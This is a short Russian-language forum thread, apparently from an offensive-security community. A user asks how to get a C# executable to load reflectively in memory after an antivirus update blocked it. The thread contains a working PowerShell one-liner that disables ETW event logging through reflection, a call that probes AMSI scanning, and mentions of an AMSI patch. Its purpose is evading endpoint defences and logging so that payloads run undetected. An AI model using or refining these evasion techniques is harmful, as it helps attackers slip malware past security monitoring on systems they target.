Ваше мнение на счет AMSI "обновления"

[WhiteDragon]

Пытался на новых обновах АВ загрузить рефлективно C# exe в память и словил "детект":

Exception calling "Load" with "1" argument(s): "Could not load file or assembly '1051648 bytes loaded from Anonymously Hosted
DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to
load a program with an incorrect format."

Не дает даже загрузить. Патчил amsi с проверкой на чек патча, так же etw, но не помогло. Провайдер амси дефолтный.
В какую сторону копать? Обфуцировать сам код [System.Reflection.Assembly]::Load($bytes) или есть другие решения?

 

[WhiteDragon]

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetMethod('ScanContent', [Reflection.BindingFlags]'NonPublic,Static').Invoke($null,  @('[Reflection.Assembly]::Load("$bytes")', ''))

так же отдал выше код на амси после патча и результат: AMSI_RESULT_NOT_DETECTED (что означает что детект конкретно амси не ловит на выше скрипт)

[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

Так же попробовал пропатчить etw этим кодом, но все же ловлю детект.